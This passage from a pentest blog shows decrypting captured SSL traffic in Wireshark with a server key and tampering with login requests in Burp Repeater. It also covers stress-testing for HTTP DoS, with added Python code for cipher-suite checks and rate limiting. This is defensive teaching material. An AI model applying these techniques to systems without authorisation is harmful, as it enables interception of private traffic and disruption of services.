<span style="background-color: #eeeeee;"><span style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span>
<span style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">After clicking this tab, in the window that appears, click the SSL entry under the "Protocols" tab in the menu area on the left.</span></span><br />
<span style="background-color: #eeeeee;"><span style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span>
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj66PIAJCvuogRjAqHVrc3EXFsa9wnIFfzZPCXmlnJ4qja3AIe3FmHxRFcxfJ5Y_x85ofTVDgHrStkqUZR8-Y8yB_E7mTZgfKVm51c6S-___Nz4MxzMyRq7E8-fExvGG8muJC7wdHaT1Qg/s1600/wi4.PNG" imageanchor="1" style="background-color: #eeeeee; margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj66PIAJCvuogRjAqHVrc3EXFsa9wnIFfzZPCXmlnJ4qja3AIe3FmHxRFcxfJ5Y_x85ofTVDgHrStkqUZR8-Y8yB_E7mTZgfKVm51c6S-___Nz4MxzMyRq7E8-fExvGG8muJC7wdHaT1Qg/s1600/wi4.PNG" height="132" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: #eeeeee;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: #eeeeee; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Let's click the "Edit" tab.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: #eeeeee; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirpbC-147dqjBixRmo2BMOO33hwzLvHW19A1iSB4hPn-tZl_qqS_KYwMQi4TBrcUumkno_3m4PuXtYyNHwPFdWM3Y0AINVWq3cqv0mRQJBBlYx-sSX1Vqnq-rAJdc0oSU3LncS5Jzo55s/s1600/wi5.PNG" imageanchor="1" style="background-color: #eeeeee; margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirpbC-147dqjBixRmo2BMOO33hwzLvHW19A1iSB4hPn-tZl_qqS_KYwMQi4TBrcUumkno_3m4PuXtYyNHwPFdWM3Y0AINVWq3cqv0mRQJBBlYx-sSX1Vqnq-rAJdc0oSU3LncS5Jzo55s/s1600/wi5.PNG" height="297" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: #eeeeee; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<span style="background-color: #eeeeee; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">With the "New" tab:</span><br />
<span style="background-color: #eeeeee;"><span style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span>
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbHW81zpWpRDMxHIwvMhac3EghbvUaSIWe-LulCnl_MNFgFTEd-5uZVvDxATe5HOLchMJod-hCI-sQZCAbhtV-KjTczz7nYnMpRtJuhNFw-0ED5J6jK77Sm9mfnV-keAMifZsfCvBEV_Q/s1600/wi6.PNG" imageanchor="1" style="background-color: #eeeeee; margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbHW81zpWpRDMxHIwvMhac3EghbvUaSIWe-LulCnl_MNFgFTEd-5uZVvDxATe5HOLchMJod-hCI-sQZCAbhtV-KjTczz7nYnMpRtJuhNFw-0ED5J6jK77Sm9mfnV-keAMifZsfCvBEV_Q/s1600/wi6.PNG" /></a></div>
<span style="background-color: #eeeeee; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">We need to specify the IP, port, protocol and the location of the key. After clicking OK and Apply, the encrypted data will be decrypted in Wireshark. Let's see the result.</span><br />
<span style="background-color: #eeeeee;"><span style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span>
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgG2HzuaLV-0Nzigjzfyjv4DLqw1cKEJdsSzICCSHPmxEf18wZ4Qa5cXB0kfNTJbj68KkVLJFE2MpvLEN37HdeA6ZSn8k1BYZvk-vzc3ue3bit-RRGGQfastxvAblIXcVHHh8BR0gRMvpE/s1600/wi7.PNG" imageanchor="1" style="background-color: #eeeeee; margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgG2HzuaLV-0Nzigjzfyjv4DLqw1cKEJdsSzICCSHPmxEf18wZ4Qa5cXB0kfNTJbj68KkVLJFE2MpvLEN37HdeA6ZSn8k1BYZvk-vzc3ue3bit-RRGGQfastxvAblIXcVHHh8BR0gRMvpE/s1600/wi7.PNG" height="141" width="400" /></a></div>
<span style="background-color: #eeeeee;"><span style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span>
<span style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Choosing "File-->Export Objects-->HTTP" also shows us the data in the traffic. With "Save As" or "Save All" we can save it to any location we like.</span></span><br />
<span style="background-color: #eeeeee;"><span style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span>
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0_j-BwjfUqykfHa7blfmWNZ1zqTP2Wpl5N0Weoh6Mjhy4s3jWMphyphenhyphenGj_GWyPBFWoFEBgvxzP6XsqtUzOqztCJ87m7o-qpH9Hte_jOUqLz0FoYy_KMabjwswnA5q1OKCpLFG5bRii27i8/s1600/wi8.PNG" imageanchor="1" style="background-color: #eeeeee; margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0_j-BwjfUqykfHa7blfmWNZ1zqTP2Wpl5N0Weoh6Mjhy4s3jWMphyphenhyphenGj_GWyPBFWoFEBgvxzP6XsqtUzOqztCJ87m7o-qpH9Hte_jOUqLz0FoYy_KMabjwswnA5q1OKCpLFG5bRii27i8/s1600/wi8.PNG" height="183" width="400" /></a></div>
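Decrypting a capture with the server's private key, as in the steps above, is possible only when the handshake negotiated an RSA key exchange; with DHE or ECDHE cipher suites the key file does not yield the session keys. The following is an added example, not from the original post: it reads the negotiated cipher suite from a ServerHello record and reports which case applies. The ServerHello bytes are constructed, and the table covers only a few well-known suite IDs.

```python
# Added example: decide from a TLS ServerHello whether the server's RSA private
# key alone is enough to decrypt a recorded session. Sample records are constructed.
import struct

# Key-exchange method for a few well-known cipher suite IDs (IANA registry values).
KEY_EXCHANGE = {
    0x000A: ("TLS_RSA_WITH_3DES_EDE_CBC_SHA", "RSA"),
    0x002F: ("TLS_RSA_WITH_AES_128_CBC_SHA", "RSA"),
    0x0035: ("TLS_RSA_WITH_AES_256_CBC_SHA", "RSA"),
    0x009C: ("TLS_RSA_WITH_AES_128_GCM_SHA256", "RSA"),
    0x0033: ("TLS_DHE_RSA_WITH_AES_128_CBC_SHA", "DHE"),
    0x0039: ("TLS_DHE_RSA_WITH_AES_256_CBC_SHA", "DHE"),
    0xC013: ("TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA", "ECDHE"),
    0xC02F: ("TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256", "ECDHE"),
}


def build_server_hello(cipher_id, session_id=b""):
    """Construct a minimal ServerHello record (sample data for this example)."""
    hello = (b"\x03\x01" + bytes(32)                    # version + 32-byte random
             + bytes([len(session_id)]) + session_id     # session id
             + struct.pack("!HB", cipher_id, 0))         # cipher suite + compression
    handshake = b"\x02" + len(hello).to_bytes(3, "big") + hello
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def server_hello_cipher(record):
    """Return the cipher suite ID selected in a ServerHello record."""
    if len(record) < 5:
        raise ValueError("record header truncated")
    content_type, _version, rec_len = struct.unpack("!BHH", record[:5])
    if content_type != 0x16:
        raise ValueError("not a handshake record")
    body = record[5:5 + rec_len]
    if len(body) != rec_len or len(body) < 4:
        raise ValueError("record body truncated")
    if body[0] != 0x02:
        raise ValueError("handshake message is not a ServerHello")
    hello = body[4:4 + int.from_bytes(body[1:4], "big")]
    if len(hello) < 35:                                  # version(2) + random(32) + sid length(1)
        raise ValueError("ServerHello truncated")
    offset = 35 + hello[34]                              # skip the session id
    if len(hello) < offset + 2:
        raise ValueError("ServerHello truncated before cipher suite")
    return int.from_bytes(hello[offset:offset + 2], "big")


def decryptable_with_server_key(record):
    """Return (suite name, verdict).

    verdict is True for RSA key exchange (the pre-master secret is encrypted to
    the server key), False for DHE/ECDHE (forward secrecy: per-session secrets
    are needed instead), None when the suite is not in the table.
    """
    cipher_id = server_hello_cipher(record)
    if cipher_id not in KEY_EXCHANGE:
        return "unknown (0x%04X)" % cipher_id, None
    name, key_exchange = KEY_EXCHANGE[cipher_id]
    return name, key_exchange == "RSA"


if __name__ == "__main__":
    for suite in (0x002F, 0xC02F, 0x1234):
        print(decryptable_with_server_key(build_server_hello(suite, bytes(32))))
```

For a defender this is the practical argument for preferring ECDHE suites: a leaked server key then does not expose previously recorded traffic.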
<br />Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-86311097187242851892014-10-23T11:06:00.001+03:002014-10-23T11:07:40.401+03:00
Cybercrime Is Now on Mobile Devices<iframe allowfullscreen="" frameborder="0" height="350" src="https://www.youtube.com/embed/UtxeRDTqQTs" width="650"></iframe>Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-76016327855949280872014-10-22T12:33:00.000+03:002014-10-22T12:36:10.531+03:00
Using Burp Suite in Web Pentest Operations-3 - (Using Repeater)<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: #eeeeee;">We will use the <strong>"Repeater"</strong> feature of the Burp Suite proxy tool. Repeater is a feature that lets us work more easily and quickly on the data sent and received, the parameters, and the application's code in the application being pentested.</span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: #eeeeee;">After capturing the first request with Burp Suite, right-clicking the captured area and choosing <strong>"Send to Repeater"</strong> activates the <strong>"Repeater"</strong> feature in the top menu. When we click Repeater, the code of the outgoing request is displayed.</span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: #eeeeee;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0qyl9MYp_mffoV43W1KphS9J11dRAxEAfCeaVNk13JWF4O82_F7Z9iz0CBm39Ve1-3IMvBVZwoaeBzM3PnW5mSC3-0n9-RN4HYD4b1kDfoU99wVXHGBaKhglC0lLLYh9NoOR-uy7nSTk/s1600/1.png" imageanchor="1" style="background-color: #eeeeee; margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0qyl9MYp_mffoV43W1KphS9J11dRAxEAfCeaVNk13JWF4O82_F7Z9iz0CBm39Ve1-3IMvBVZwoaeBzM3PnW5mSC3-0n9-RN4HYD4b1kDfoU99wVXHGBaKhglC0lLLYh9NoOR-uy7nSTk/s1600/1.png" height="97" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: #eeeeee;"><br /></span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: #eeeeee;">To deliver the incoming request to the server, we click the <strong>"Go"</strong> button.</span><br />
<a name='more'></a></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: #eeeeee;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnBXLRIFxJv2wOrssC-U9lkLXL4Tyu_aRQneHRvQgXCvIW1iEZ1TT8bz-lnwT1dUBU4dNdJQcyAbLuQQnnXKZoZQIrv5qu78ORLc138BNAacrFr5igOO1fkpxAZkoPwJT3e7KTmqm8faA/s1600/iki.png" imageanchor="1" style="background-color: #eeeeee; margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnBXLRIFxJv2wOrssC-U9lkLXL4Tyu_aRQneHRvQgXCvIW1iEZ1TT8bz-lnwT1dUBU4dNdJQcyAbLuQQnnXKZoZQIrv5qu78ORLc138BNAacrFr5igOO1fkpxAZkoPwJT3e7KTmqm8faA/s1600/iki.png" height="250" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: #eeeeee;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: #eeeeee;"><span style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">The server returns a response to us. By clicking the </span><strong style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">"Follow redirection"</strong><span style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"> button we see the HTML output of the request. This lets us see from here whether the request succeeded.</span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: #eeeeee; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj40bgBVkXh5rw5PibLYdqXFvbB-w5XjCxM9rKhyphenhyphenIdsR5wjBGorb8am_01j9E5yK1whBZVIP9PQdRJ-pPEp66zPuNR6jP4Tkh-8qLqbKQnWppd2cvXdlHeeCitsUrkkDDksOo4Y9Agko64/s1600/dort.png" imageanchor="1" style="background-color: #eeeeee; margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj40bgBVkXh5rw5PibLYdqXFvbB-w5XjCxM9rKhyphenhyphenIdsR5wjBGorb8am_01j9E5yK1whBZVIP9PQdRJ-pPEp66zPuNR6jP4Tkh-8qLqbKQnWppd2cvXdlHeeCitsUrkkDDksOo4Y9Agko64/s1600/dort.png" height="212" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: #eeeeee; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: #eeeeee;"><span style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Let's change the parameters to </span><strong style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">admin=admin&password=password</strong><span style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"> and look at the result.</span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: #eeeeee; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwgkg1iGvlZuWWwfgSejO-aEts8nFSbhMP-9k2KG-GR1IYkjuuFi8fRdA9hmZVBYjfAxjcipU3VX1-dQk9wc8SMptMwxn7TsYGtmFuRcRADP8iCj7bkkSvrKzfhgyh8drg3EQgcEFnugc/s1600/yedi.png" imageanchor="1" style="background-color: #eeeeee; margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwgkg1iGvlZuWWwfgSejO-aEts8nFSbhMP-9k2KG-GR1IYkjuuFi8fRdA9hmZVBYjfAxjcipU3VX1-dQk9wc8SMptMwxn7TsYGtmFuRcRADP8iCj7bkkSvrKzfhgyh8drg3EQgcEFnugc/s1600/yedi.png" height="218" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: #eeeeee; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: #eeeeee; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">This way, Repeater lets us carry out pentest operations faster.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: #eeeeee;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: #eeeeee;"><br /></span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;"><br /></span></div>
Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-17126702394704733172014-10-21T16:42:00.001+03:002014-10-21T16:54:24.106+03:00 Testing for HTTP DoS Attacks<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
We designed a web site, coded it and made it ready for release. Opening this site to the public directly, without subjecting it to any testing, means accepting the risk of dozens of possible attacks. While designing the site, coding it and laying out the system architecture, we must always take attacks into account. Details that look minor to us but count as an open door to an attacker cause the effort put into the site to go to waste.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br />
Suppose we coded the site robustly, put it through some form of pentest, and as a result closed every door that posed a serious risk. After that we opened the site to the public. Once a site goes live, its web traffic is assessed by the number of visitors. There are visitors who want to view the site at particular hours, minutes or seconds of the day, or within even shorter intervals.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br />
What difference is there between one visitor and ten, a hundred, a thousand or a million visitors?</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
How do sites that receive a thousand requests within ten seconds, or a hundred thousand within a minute, handle that many requests?<br />
<a name='more'></a></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
The answer to these questions lies in the answer to another question: "do we ever subject the site to a stress test before launching it?"<br />
<br />
Let's pull the topic together.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Web sites run on a client-server architecture. In this architecture every request made by the client is sent to the server. The server has to answer within the limit of its own fixed number of request-queue slots. Each request may be independent of the others, or all of the requests may be identical. The size of the requested page and the CPU load, network traffic and similar values it generates on the server are important parameters in serving requests.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br />
Therefore, stress-testing the sites we are about to launch lets us test the likely consequences of an HTTP DoS attack. If the number of requests coming to a site from different addresses is more than the servers hosting the site can handle, then even under normal conditions this amounts to a DoS attack or produces an equivalent result.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br />
Now let's think about the situation from an attack perspective. When we evaluate the number of requests coming from one, two or a dozen IP blocks against the time parameter, we get a request count over time.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
For example, 100 requests in 5 seconds, or 1000 requests in 1 second...</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br />
Requests like these, made with attack intent, can indicate that an HTTP DoS attack is starting. So what kind of measure should be taken against these multiple requests coming from the same IP? Not every request will take the form of a normal user requesting a normal page.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br />
For this many requests coming from the same IP address, a rule can be created stating that only a certain number of requests may be made within a certain period.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br />
An attacker attempting a brute-force attack on the login screen can send hundreds of requests per second. In that case the site's ability to respond is seriously affected.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUbbPQogkpbNYywFpOAuO1019BXzMYYpEyDdtirITUX8kpavRWkgFunHdjcgLKILJwNVnOVhV4vcdjkV3MLGstyrJItEQ3S9dbkd6nDn1KoiWtSrTliMpIYq5b9nTGyerjfxDxjVwkNNs/s1600/intruder-6-1024x576.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUbbPQogkpbNYywFpOAuO1019BXzMYYpEyDdtirITUX8kpavRWkgFunHdjcgLKILJwNVnOVhV4vcdjkV3MLGstyrJItEQ3S9dbkd6nDn1KoiWtSrTliMpIYq5b9nTGyerjfxDxjVwkNNs/s1600/intruder-6-1024x576.png" height="225" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
In such cases, once a certain time has passed or a certain number of requests has been served, a CAPTCHA can be shown to verify the visitor.</div>
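The per-IP rule and the CAPTCHA step described above, sketched as an added example (not code from the original post): a sliding-window limiter replayed over constructed access-log lines. The 100-requests-in-5-seconds threshold is the post's own figure; the block threshold of 200, the IP addresses and the log lines are assumptions made for the illustration.

```python
import re
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta, timezone

ALLOW, CHALLENGE, BLOCK = "allow", "challenge", "block"

# Start of an Apache/nginx common-log-format line: ip - - [time] "METHOD path
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)')


class SlidingWindowLimiter:
    """Counts requests per client IP inside a moving time window."""

    def __init__(self, window_seconds=5, challenge_after=100, block_after=200):
        self.window = window_seconds
        self.challenge_after = challenge_after  # figure taken from the post
        self.block_after = block_after          # assumed value
        # Only the newest block_after + 1 timestamps are kept per IP, so a
        # flooding client cannot grow this structure without bound.
        self._hits = defaultdict(lambda: deque(maxlen=block_after + 1))

    def check(self, ip, now):
        """Record one request at time `now` (epoch seconds) and return a verdict."""
        hits = self._hits[ip]
        cutoff = now - self.window
        while hits and hits[0] <= cutoff:   # forget requests outside the window
            hits.popleft()
        hits.append(now)
        if len(hits) > self.block_after:
            return BLOCK
        if len(hits) > self.challenge_after:
            return CHALLENGE                # e.g. show a CAPTCHA
        return ALLOW


def parse_line(line):
    """Return (ip, epoch_seconds) for a log line, or None if it is malformed."""
    match = LOG_RE.match(line)
    if not match:
        return None
    try:
        stamp = datetime.strptime(match.group(2), "%d/%b/%Y:%H:%M:%S %z")
    except ValueError:
        return None
    return match.group(1), stamp.timestamp()


def classify_log(lines, limiter=None):
    """Replay log lines in order and count the verdicts issued per IP."""
    limiter = limiter or SlidingWindowLimiter()
    verdicts = defaultdict(Counter)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue                        # skip lines we cannot parse
        ip, epoch = parsed
        verdicts[ip][limiter.check(ip, epoch)] += 1
    return {ip: dict(counts) for ip, counts in verdicts.items()}


def build_sample_log():
    """Constructed data: one ordinary visitor and one login brute-forcer."""
    base = datetime(2014, 10, 21, 16, 42, 0, tzinfo=timezone(timedelta(hours=3)))
    events = []
    for i in range(30):                     # one page view every 2 seconds
        events.append((base + timedelta(seconds=2 * i),
                       "198.51.100.20", "GET", "/index.php"))
    for second in range(6):                 # 50 login attempts per second
        for _ in range(50):
            events.append((base + timedelta(seconds=second),
                           "203.0.113.7", "POST", "/login.php"))
    events.sort(key=lambda event: event[0])
    lines = []
    for stamp, ip, method, path in events:
        when = stamp.strftime("%d/%b/%Y:%H:%M:%S %z")
        lines.append(f'{ip} - - [{when}] "{method} {path} HTTP/1.1" 200 512')
    lines.append("truncated or corrupt line")   # must be ignored by the parser
    return lines


if __name__ == "__main__":
    for ip, counts in classify_log(build_sample_log()).items():
        print(ip, counts)
```

Run against real logs, the same replay shows how many legitimate visitors a candidate threshold would have challenged before it is enforced at the web server or WAF.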
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Below is a tool that performs stress testing for a web site. Its usage is shown below. For the Free Trial...</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Address: <a data-mce-href="http://www.paessler.com/webstress" href="http://www.paessler.com/webstress">http://www.paessler.com/webstress</a></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu4BiEi-2yCq-0_5VxROc1D3SqIAbU2tIN24CMhu0p-loXJo2tJqcBpZKXCrZ7VSqzC8UyJvhejj6srGYe5nJ-g3ojG1VZ2JZ0fIgbk8owLurRSXGY8hyphenhyphendZf2nDDFh246J73mtKZZPADA/s1600/H1-1024x503.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu4BiEi-2yCq-0_5VxROc1D3SqIAbU2tIN24CMhu0p-loXJo2tJqcBpZKXCrZ7VSqzC8UyJvhejj6srGYe5nJ-g3ojG1VZ2JZ0fIgbk8owLurRSXGY8hyphenhyphendZf2nDDFh246J73mtKZZPADA/s1600/H1-1024x503.png" height="196" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">For the address of the site to be tested...</span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimtelpUFNpmjA1V8BJG-N521PEl1qsPbA9tczG_1tPr6fOWAIH798fhYr3UqSObE5atzjKBXTVhOtO2sg7ddw8duWezA7IsqN8CropjM2psIvDSX6MmJT_-Zw5V1WtCOy7s2pWkqDsPWs/s1600/H2-1024x292.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimtelpUFNpmjA1V8BJG-N521PEl1qsPbA9tczG_1tPr6fOWAIH798fhYr3UqSObE5atzjKBXTVhOtO2sg7ddw8duWezA7IsqN8CropjM2psIvDSX6MmJT_-Zw5V1WtCOy7s2pWkqDsPWs/s1600/H2-1024x292.png" height="113" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">Let's start the stress test</span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
